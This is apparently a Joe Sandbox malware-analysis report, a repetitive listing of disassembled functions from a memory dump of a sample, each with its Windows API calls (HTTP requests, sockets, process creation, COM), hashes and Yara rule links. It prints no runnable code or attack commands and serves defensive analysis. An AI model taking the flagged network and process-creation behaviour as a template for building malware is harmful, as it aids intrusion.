                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                        • Opcode ID: 9b7d77ca16ade2815803a777434407bfa877e8f087a90d98ea4937139c040a03
                                                                                                                        • Instruction ID: 4b43414e4ffa15a04bcdf5b06101d9baff62b8d242fbed48ed98f3fda976298c
                                                                                                                        • Opcode Fuzzy Hash: 9b7d77ca16ade2815803a777434407bfa877e8f087a90d98ea4937139c040a03
                                                                                                                        • Instruction Fuzzy Hash: 9C1106B6248302B9FA043E34AC0ADA677ECDB47324B301092F91CF50D2FB71A8416770
                                                                                                                        Function 00EAB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB777
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00EAB7A4
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAB7AE
                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00EAB8AE
                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EAB9DB
                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00EABA0F
                                                                                                                        • CoGetObject.OLE32(?,00000000,00EDD91C,?), ref: 00EABA32
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00EABA45
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EABAC5
                                                                                                                        • VariantClear.OLEAUT32(00EDD91C), ref: 00EABAD5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395222682-0
                                                                                                                        • Opcode ID: 7f1120dcb3a2581160bdb21397034d635aa9bebf1eb6038b4294bb253cb70816
                                                                                                                        • Instruction ID: be5d351640a8d7b3c27ddc76f88cb98e2aa78a028de01e5db675e7421c4e3df6
                                                                                                                        • Opcode Fuzzy Hash: 7f1120dcb3a2581160bdb21397034d635aa9bebf1eb6038b4294bb253cb70816
                                                                                                                        • Instruction Fuzzy Hash: 88C114716083059FC704DF68C88496BBBE9FF89308F14591DF98AAB252DB71ED05CB52
                                                                                                                        Function 00E9B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00E9B137
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1725837607-0
                                                                                                                        • Opcode ID: 8ba591b30633d6a413e98e984dcc740f9b45d389978a2adad4b3ed30bc63add3
                                                                                                                        • Instruction ID: f45d8a962d45db45e81f711a45c94517e4ca52dfc6ce7988bf14a6d0426c91ce
                                                                                                                        • Opcode Fuzzy Hash: 8ba591b30633d6a413e98e984dcc740f9b45d389978a2adad4b3ed30bc63add3
                                                                                                                        • Instruction Fuzzy Hash: 31C17975A0121ADFDF04CF98E581BAEB7F4EF08315F24506AE616F7291C774AA81CB90
                                                                                                                        Function 00E97212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00E97226
                                                                                                                        • __swprintf.LIBCMT ref: 00E97233
                                                                                                                          • Part of subcall function 00E7234B: __woutput_l.LIBCMT ref: 00E723A4
                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E9725D
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E97269
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00E97276
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00E97296
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E972A8
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00E972B7
                                                                                                                        • LockResource.KERNEL32(?), ref: 00E972C3
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E97322
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1433390588-0
                                                                                                                        • Opcode ID: 582be1bc03daa81f35a836def0c02fedc36b43263326735a9b9822eb5b77a1f8
                                                                                                                        • Instruction ID: 4a14442ddd253966f62e62a8320269bc499c745e599dbabd608ceac90fa2fc8c
                                                                                                                        • Opcode Fuzzy Hash: 582be1bc03daa81f35a836def0c02fedc36b43263326735a9b9822eb5b77a1f8
                                                                                                                        • Instruction Fuzzy Hash: E331ADB191921AAFCF019F61AC89AFF7BA8FF08300B008426F941F2160E734D954DAA0
                                                                                                                        Function 00ECEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00ECEC32
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ECEC49
                                                                                                                        • GetWindowDC.USER32(?), ref: 00ECEC55
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ECEC64
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECEC76
                                                                                                                        • GetSysColor.USER32(00000005), ref: 00ECEC94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 272304278-0
                                                                                                                        • Opcode ID: 0f6dd3d36f3b8d2ccd0667021c9913bad1329176f49849394a1ba941500026b5
                                                                                                                        • Instruction ID: 27a8956ef090d629fa70fa00c0194ddcd25eb94a5ba39d473a7fa94249ea304d
                                                                                                                        • Opcode Fuzzy Hash: 0f6dd3d36f3b8d2ccd0667021c9913bad1329176f49849394a1ba941500026b5
                                                                                                                        • Instruction Fuzzy Hash: 14218C31546248EFDB21AB61FD48FE97B75EB04325F104226FA26B51E1CB324985DF11
                                                                                                                        Function 00E8D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnumChildWindows.USER32(?,00E8DD46), ref: 00E8DC86
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                        • Opcode ID: 306f2a47bb8d329ffbb97855b32f8ea5faddb0b14f9f0e927d3aa9b2327a020a
                                                                                                                        • Instruction ID: 6f6d5bd5830c10cbb9ae0efaee8837c37bc6e8711c162e72ab5981551dd02a7b
                                                                                                                        • Opcode Fuzzy Hash: 306f2a47bb8d329ffbb97855b32f8ea5faddb0b14f9f0e927d3aa9b2327a020a
                                                                                                                        • Instruction Fuzzy Hash: 5091B230A04606EACB0CEF64C881BEDFBB5BF04354F54A559D85EB71D1DB30A94ADBA0
                                                                                                                        Function 00E6C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E6C2D2
                                                                                                                          • Part of subcall function 00E6C697: GetClientRect.USER32(?,?), ref: 00E6C6C0
                                                                                                                          • Part of subcall function 00E6C697: GetWindowRect.USER32(?,?), ref: 00E6C701
                                                                                                                          • Part of subcall function 00E6C697: ScreenToClient.USER32(?,?), ref: 00E6C729
                                                                                                                        • GetDC.USER32 ref: 00ECE006
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ECE019
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ECE027
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ECE03C
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECE044
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ECE0CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                        • Opcode ID: a0d33e6d48d78d3dbda3c6317ef643b098454b9e3fabfa33db4c070deb079cc7
                                                                                                                        • Instruction ID: 14cf1dadadb30296c3226e1eb573d0514d75b30fda7e061c8f41b9d908bc2f17
                                                                                                                        • Opcode Fuzzy Hash: a0d33e6d48d78d3dbda3c6317ef643b098454b9e3fabfa33db4c070deb079cc7
                                                                                                                        • Instruction Fuzzy Hash: 9A71C031500208DFCF218F64DD81EFA7BB5FF49364F246269ED957A2A6C7328842DB91
                                                                                                                        Function 00EBEAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                          • Part of subcall function 00E6B736: GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                          • Part of subcall function 00E6B736: ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00EBEB0E
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00EBEB14
                                                                                                                        • ReleaseCapture.USER32 ref: 00EBEB1A
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00EBEBC2
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EBEBD5
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00EBECAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                        • Opcode ID: c271f084d70e2bb02914d9ef8f3c40c757c5b90b6b751594c14269de15fb56af
                                                                                                                        • Instruction ID: a298893cb1446f1c885eae25c85c24a5c5bfa7e98c452374b27eed06f076426d
                                                                                                                        • Opcode Fuzzy Hash: c271f084d70e2bb02914d9ef8f3c40c757c5b90b6b751594c14269de15fb56af
                                                                                                                        • Instruction Fuzzy Hash: 6F51BD70204304AFD710EF24DC96FAA7BE5FB88714F008A1DFA91A72E2D7709908DB52
                                                                                                                        Function 00EA4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EA4C5E
                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EA4C8A
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EA4CCC
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EA4CE1
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA4CEE
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EA4D1E
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EA4D65
                                                                                                                          • Part of subcall function 00EA56A9: GetLastError.KERNEL32(?,?,00EA4A2B,00000000,00000000,00000001), ref: 00EA56BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                        • Opcode ID: f37626ca93789bb9a0a8dc15027b38416c96ffc46556e34ac484de12084bdf16
                                                                                                                        • Instruction ID: 3bb45df81b75a59d54fea9221c324401bf653ae0e9b311421359ee7c8309ba77
                                                                                                                        • Opcode Fuzzy Hash: f37626ca93789bb9a0a8dc15027b38416c96ffc46556e34ac484de12084bdf16
                                                                                                                        • Instruction Fuzzy Hash: 43417DB1501618BFEB129F60DC89FFA77ACEF4D314F10515AFA05AE191D7B0AD448BA0
                                                                                                                        Function 00EABAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EEDBF0), ref: 00EABBA1
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EEDBF0), ref: 00EABBD5
                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EABD33
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00EABD5D
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00EEDBF0), ref: 00EABEAD
                                                                                                                        • ProgIDFromCLSID.OLE32(?,?,?,00EEDBF0), ref: 00EABEF7
                                                                                                                        • CoTaskMemFree.OLE32(?,?,?,00EEDBF0), ref: 00EABF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 793797124-0
                                                                                                                        • Opcode ID: 332dcd5ec09cb45593b0ded75f2fde2d74023c8a7761220d94bebbe1ef137ecf
                                                                                                                        • Instruction ID: ae8bb58fcd45e4d00b202eac6d44ac9d8611577e64fdc7278c39ccc1954343d3
                                                                                                                        • Opcode Fuzzy Hash: 332dcd5ec09cb45593b0ded75f2fde2d74023c8a7761220d94bebbe1ef137ecf
                                                                                                                        • Instruction Fuzzy Hash: EAF11975A00209EFCF04DFA4C884EAEB7B9FF89314F149499F916AB251DB31AE45CB50
                                                                                                                        Function 00EB23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB23E6
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EB2579
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EB259D
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EB25DD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EB25FF
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EB2760
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EB2792
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB27C1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB2838
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4090791747-0
                                                                                                                        • Opcode ID: d9d8297c809f77ad1495879e0e8c1ed18be7078c086218fa42d163d53b64928f
                                                                                                                        • Instruction ID: 2a9c5c12a288cdfe531a44d24356c8ada3f182b3003ca5279c13cc36620ade84
                                                                                                                        • Opcode Fuzzy Hash: d9d8297c809f77ad1495879e0e8c1ed18be7078c086218fa42d163d53b64928f
                                                                                                                        • Instruction Fuzzy Hash: E3D1B031604301DFCB15EF24C891AAABBE5EF85314F14985DF999BB2A2DB30DC45CB52
                                                                                                                        Function 00EA9A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32 ref: 00EA9B38
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9B45
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00EA9B6F
                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EA9B90
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9B9F
                                                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00EA9C51
                                                                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00EEDBF0), ref: 00EA9C0C
                                                                                                                          • Part of subcall function 00E8E0F5: _strlen.LIBCMT ref: 00E8E0FF
                                                                                                                          • Part of subcall function 00E8E0F5: _memmove.LIBCMT ref: 00E8E121
                                                                                                                        • _strlen.LIBCMT ref: 00EA9CA7
                                                                                                                        • _memmove.LIBCMT ref: 00EA9D10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3637404534-0
                                                                                                                        • Opcode ID: b0b99ecaba8401c3e7b28c1d62c8557a3d7965d7922b9abb4ed689871ed4d6ad
                                                                                                                        • Instruction ID: fe6c8dfc9011409d2c249bdccc6a05e4037e21cedacaba78f3844fdb3adc34ea
                                                                                                                        • Opcode Fuzzy Hash: b0b99ecaba8401c3e7b28c1d62c8557a3d7965d7922b9abb4ed689871ed4d6ad
                                                                                                                        • Instruction Fuzzy Hash: C181AF71508200AFC710EF64DC55E6BB7E8EF89714F14591EF956AB292DB30ED08CBA2
                                                                                                                        Function 00EBB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EBB204
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
